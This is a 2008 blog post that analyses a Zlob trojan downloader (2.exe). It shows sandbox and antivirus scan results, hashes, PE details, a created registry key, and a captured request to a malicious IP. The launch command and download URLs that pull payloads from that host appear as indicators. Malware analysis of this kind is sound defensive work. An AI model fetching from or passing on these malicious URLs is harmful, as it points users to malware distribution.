Sunday, October 19, 2008

From Virus Alert to Pwnage Part 2


Some analysis on 2.exe.

2.exe : Not detected by Sandbox (Signature: NO_VIRUS)


[ DetectionInfo ]
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS
* Compressed: YES
* TLS hooks: NO
* Executable type: Application
* Executable file structure: OK
* Filetype: PE_I386

[ General information ]
* Decompressing UPX3.
* File length: 2560 bytes.
* MD5 hash: c6e1de2f6ecae93c09c6bae78d8edcbf.

[ Changes to registry ]
* Creates key "HKCU\Software\Microsoft\Sound".



AhnLab-V3 2008.10.15.0 2008.10.14 -
AntiVir 7.8.1.34 2008.10.14 -
Authentium 5.1.0.4 2008.10.14 -
Avast 4.8.1248.0 2008.10.15 -
AVG 8.0.0.161 2008.10.15 -
BitDefender 7.2 2008.10.15 Trojan.Zlob.1.Gen
CAT-QuickHeal 9.50 2008.10.14 -
ClamAV 0.93.1 2008.10.15 -
DrWeb 4.44.0.09170 2008.10.15 -
eSafe 7.0.17.0 2008.10.12 Suspicious File
eTrust-Vet 31.6.6148 2008.10.14 -
Ewido 4.0 2008.10.14 -
F-Prot 4.4.4.56 2008.10.14 -
F-Secure 8.0.14332.0 2008.10.15
Trojan-Downloader.Win32.Zlob.ajl
Fortinet 3.113.0.0 2008.10.14 -
GData 19 2008.10.15 Trojan.Zlob.1.Gen
Ikarus T3.1.1.34.0 2008.10.15 -
K7AntiVirus 7.10.493 2008.10.14 -
Kaspersky 7.0.0.125 2008.10.15
Trojan-Downloader.Win32.Zlob.ajl
McAfee 5405 2008.10.14 -
Microsoft 1.4005 2008.10.15 -
NOD32 3522 2008.10.14 -
Norman 5.80.02 2008.10.14 -
Panda 9.0.0.4 2008.10.14 Suspicious file
PCTools 4.4.2.0 2008.10.14 -
Prevx1 V2 2008.10.15 Malicious Software
Rising 20.66.12.00 2008.10.14 -
SecureWeb-Gateway 6.7.6 2008.10.15 -
Sophos 4.34.0 2008.10.15 Sus/Behav-1005
Sunbelt 3.1.1722.1 2008.10.14 -
Symantec 10 2008.10.15 Downloader
TheHacker 6.3.1.0.112 2008.10.15 -
TrendMicro 8.700.0.1004 2008.10.14 PAK_Generic.001
VBA32 3.12.8.6 2008.10.14 -
ViRobot 2008.10.14.1419 2008.10.14 -
VirusBuster 4.5.11.0 2008.10.14 -
Additional information
File size: 2560 bytes
MD5...: c6e1de2f6ecae93c09c6bae78d8edcbf
SHA1..: 1b1d7916206583a57e54fe82ebe05a8fb55b25d5
SHA256: 68350cc81af2e867eecea64f1cc83e34ff8c19ad22b8c077529380cdadeaa658
SHA512: 512fd40e91bd47c1e6f1a0e202457cc5fe31ed90a2555f9af8a54796663b3c7a
308729d606a409ef8484edf9bf4b4a1310db8cba61b941b380f6d2ee09e3c694
PEiD..: -
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x4041c0
timedatestamp.....: 0x48eeb35b (Fri Oct 10 01:43:55 2008)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x3000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x4000 0x1000 0x400 6.22 ad30fe5c04339024e6b3344e72484898
UPX2 0x5000 0x1000 0x200 2.06 ebb1b5a9cd4ce06c69ef5ac4d3d7b72b

( 2 imports )
KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc,
VirtualFree, ExitProcess
ADVAPI32.dll: RegCloseKey

( 0 exports )
Prevx info:
http://info.prevx.com/aboutprogramtext.asp?PX5=54E3AAE0008B14250A3900BD90B69
A00B79BCD14
packers (Kaspersky): PE_Patch.UPX, UPX
packers (F-Prot): UPX


Filename c:\2.exe
Filesize 2560 bytes
MD5 c6e1de2f6ecae93c09c6bae78d8edcbf
DLL-Handling
Loaded DLLs
C:\WINDOWS\system32\ntdll.dll
C:\WINDOWS\system32\kernel32.dll
C:\WINDOWS\system32\ADVAPI32.dll
C:\WINDOWS\system32\RPCRT4.dll
C:\WINDOWS\system32\Secur32.dll
C:\WINDOWS\system32\user32.dll
C:\WINDOWS\system32\GDI32.dll
C:\WINDOWS\system32\oleaut32.dll
C:\WINDOWS\system32\msvcrt.dll
C:\WINDOWS\system32\ole32.dll
C:\WINDOWS\system32\IMM32.DLL
C:\WINDOWS\system32\pstorec.dll
C:\WINDOWS\system32\ATL.DLL
Registry
Process Management Creates Process - Filename () CommandLine:
(C:\Program Files\Internet Explorer\iexplore.exe

http://94.75.221.68/stuff/border8.gif) As User: () Creation Flags: ()

--------

Found a norton report based on the IP

https://safeweb.norton.com/report/show?url=94.75.221.68&x=0&y=0

Severity: High

3 instances found. Here is a sample:

Downloader
Location: http://94.75.221.68/stuff/border10.gif
Downloader
Location: http://94.75.221.68/stuff/border8.gif
Downloader
Location: http://94.75.221.68/stuff/border9.gif

----------
**show tcpstream from running the 2.exe in a VM

GET /stuff/border9.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Host: 94.75.221.68
Connection: Keep-Alive

HTTP/1.1 404 Not Found
Server: nginx/0.5.20
Date: Wed, 15 Oct 2008 20:27:23 GMT
Content-Type: text/html
Content-Length: 529
Connection: close


html
head title 404 Not Found /title /head
body bgcolor="white"
center h1 404 Not Found /h1 /center
hr center nginx/0.5.20 /center
/body
/html
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --

**I removed the brackets because blogspot kept rendering the html :-(
CG

No comments: